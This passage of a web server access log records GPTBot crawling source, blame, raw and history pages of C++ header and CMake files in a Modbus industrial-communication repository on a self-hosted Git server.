compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11521] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12468] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12969] [Gzip 5.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11825] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11145] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12838] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11522] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10058] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10218] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11991] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10085] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12761] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11318] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12834] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10432] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13638] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12510] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12702] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 